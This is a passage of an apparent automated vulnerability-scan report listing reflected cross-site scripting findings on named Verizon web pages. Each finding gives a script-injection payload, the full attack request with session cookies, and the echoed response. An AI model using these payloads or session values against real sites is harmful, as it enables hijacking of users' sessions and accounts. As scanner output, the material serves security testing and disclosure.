Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217149624; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort&965b3"><script>alert(1)</script>021e0c9eefd=1" />
...[SNIP]...

1.13. http://www.verizonwireless.com/b2c/store/controller [sortOption parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/store/controller

Issue detail

The value of the sortOption request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52fd0"><script>alert(1)</script>f8982710445 was submitted in the sortOption parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort52fd0"><script>alert(1)</script>f8982710445 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:39:09 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217149341; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort52fd0"><script>alert(1)</script>f8982710445" />
...[SNIP]...

1.14. http://www.verizonwireless.com/b2c/vzwfly [go parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/vzwfly

Issue detail

The value of the go request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3efe"><script>alert(1)</script>c43e1d77ad was submitted in the go parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/vzwfly?go=/ContactUsControllerServleta3efe"><script>alert(1)</script>c43e1d77ad HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://aboutus.vzw.com/leadership/executive/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df; SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; TIME_CHECKER=1290217138069; __utma=96859928.604975816.1290217110.1290217110.1290217110.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1290217110.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:39:11 GMT
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<htm
...[SNIP]...
<input type="hidden" name="query" value="go=/ContactUsControllerServleta3efe"><script>alert(1)</script>c43e1d77ad" />
...[SNIP]...

1.15. http://www.verizonwireless.com/b2c/vzwfly [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/vzwfly

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ec15"><script>alert(1)</script>aa80984e70d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/vzwfly?go=/ContactUsControllerServlet&3ec15"><script>alert(1)</script>aa80984e70d=1 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://aboutus.vzw.com/leadership/executive/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df; SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; TIME_CHECKER=1290217138069; __utma=96859928.604975816.1290217110.1290217110.1290217110.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1290217110.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:39:12 GMT
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<htm
...[SNIP]...
<input type="hidden" name="query" value="go=/ContactUsControllerServlet&3ec15"><script>alert(1)</script>aa80984e70d=1" />
...[SNIP]...

1.16. http://www.verizonwireless.com/b2c/vzwfly [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/vzwfly

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f155"><script>alert(1)</script>3108fa274df22e375 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /b2c/vzwfly?query=go%3D%2FContactUsControllerServlet7f155"><script>alert(1)</script>3108fa274df22e375&fd=&go=%2FContactUsControllerServlet&zipcode=&rememberMyZip=&state=&prevstate=&change=&filter= HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/vzwfly?go=/ContactUsControllerServlet
Cache-Control: max-age=0
Origin: http://www.verizonwireless.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df; SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; TIME_CHECKER=1290217138069; __utma=96859928.604975816.1290217110.1290217110.1290217110.1; __utmc=96859928; __utmz=96859928.1290217110.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=96859928

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:39:42 GMT
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<htm
...[SNIP]...
<input type="hidden" name="query" value="query=go%3D%2FContactUsControllerServlet7f155"><script>alert(1)</script>3108fa274df22e375&fd=&go=%2FContactUsControllerServlet&zipcode=&rememberMyZip=&state=&prevstate=&change=&filter=" />
...[SNIP]...

1.17. http://www22.verizon.com/Content/LearnShop/intermediate.aspx [target parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/LearnShop/intermediate.aspx

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5f29'%3balert(1)//21f8d5e4943 was submitted in the target parameter. This input was echoed as f5f29';alert(1)//21f8d5e4943 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Content/LearnShop/intermediate.aspx?target=https://f5f29'%3balert(1)//21f8d5e4943 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 1943
Expires: Sat, 20 Nov 2010 01:54:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:54:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Shop For Ser
...[SNIP]...
<script>var url = 'https://f5f29';alert(1)//21f8d5e4943'; document.form1.action=url;document.form1.submit();</script>
...[SNIP]...

1.18. http://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx [Client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx

Issue detail

The value of the Client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 397a9"%3balert(1)//24d5afdbc59 was submitted in the Client parameter. This input was echoed as 397a9";alert(1)//24d5afdbc59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?Client=VZSA397a9"%3balert(1)//24d5afdbc59&FlowRoute=VZSA-NDSL&getstarted=2intherohsilq HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 22732
Expires: Sat, 20 Nov 2010 02:36:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:36:10 GMT
Connection: close
Set-Cookie: EOrdering=PN-DR-ENABLED=iVwfNps%2fXq8%3d&PROJNORTH-CLIENT=&WR58038_DC=efZHv8OIFvI%3d&HBXSOURCE=TiFI0EpTTVOnzjDD4KXHGQ%3d%3d; domain=.verizon.com; path=/

<script language="javascript">    vzLogging_appName = "eOrdering";</script>

<script language="javascript" src="../Common/includes/js/pagetracker.js"></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD
...[SNIP]...


               locationHref = locationHref + "&Client=" + "VZSA397a9";alert(1)//24d5afdbc59"


           location.href = locationHref + catHref;
           var appname = navigator.appName;
           if(appname != "Netscape")
           {

            var tempHTML = document.getElementById(Ctrl1).innerHTML;

...[SNIP]...

1.19. http://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx [FlowRoute parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx

Issue detail

The value of the FlowRoute request parameter is copied into a JavaScript rest-of-line comment. The payload 1a9d4%0aalert(1)//c623c9a1ad was submitted in the FlowRoute parameter. This input was echoed as 1a9d4
alert(1)//c623c9a1ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?Client=VZSA&FlowRoute=VZSA-NDSL1a9d4%0aalert(1)//c623c9a1ad&getstarted=2intherohsilq HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 22752
Expires: Sat, 20 Nov 2010 02:36:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:36:20 GMT
Connection: close
Set-Cookie: EOrdering=PN-DR-ENABLED=iVwfNps%2fXq8%3d&PROJNORTH-CLIENT=&WR58038_DC=efZHv8OIFvI%3d&HBXSOURCE=%2fhVcACS2B8Xn295HYL3i%2fTN0dmEOUd9D; domain=.verizon.com; path=/

<script language="javascript"> vzLogging_appName = "eOrdering";</script>

<script language="javascript" src="../Common/includes/js/pagetracker.js"></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD
...[SNIP]...
//End

//Changes made for Project North - if condition added
if ( PostDataToDifferentDataCenter != "Y" )
{

//FlowRoute = "VZSA-NDSL1a9d4
alert(1)//c623c9a1ad";
FlowRoute = ("VZSA-NDSL1a9d4
alert(1)//c623c9a1ad");

LQHref = ("2intherohsilq");

locationHref ="RegistrationBridgeProcess.
...[SNIP]...

1.20. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 998fb"><script>alert(1)</script>6b05b3d5712 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?998fb"><script>alert(1)</script>6b05b3d5712=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA24V
Content-Type: text/html; charset=utf-8
Content-Length: 47344
Expires: Sat, 20 Nov 2010 02:36:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:36:02 GMT
Connection: close
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f945525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&998fb"><script>alert(1)</script>6b05b3d5712=1" name="target">
...[SNIP]...

1.21. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ea9c'-alert(1)-'d380d77ee59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?5ea9c'-alert(1)-'d380d77ee59=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA11V
Content-Type: text/html; charset=utf-8
Content-Length: 133536
Expires: Sat, 20 Nov 2010 02:41:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:41:24 GMT
Connection: close

<SCRIPT language=javascript>function checkforempty()
           {

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
<script language="javascript" type="text/javascript">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?5ea9c'-alert(1)-'d380d77ee59=1';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();

...[SNIP]...

1.22. http://www22.verizon.com/residentialhelp/globalheaderhelp.aspx [appname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/globalheaderhelp.aspx

Issue detail

The value of the appname request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f16d'><script>alert(1)</script>9530f6d8cb8 was submitted in the appname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /residentialhelp/globalheaderhelp.aspx?ignoreHelpnet=y&appname=help-net2f16d'><script>alert(1)</script>9530f6d8cb8 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; 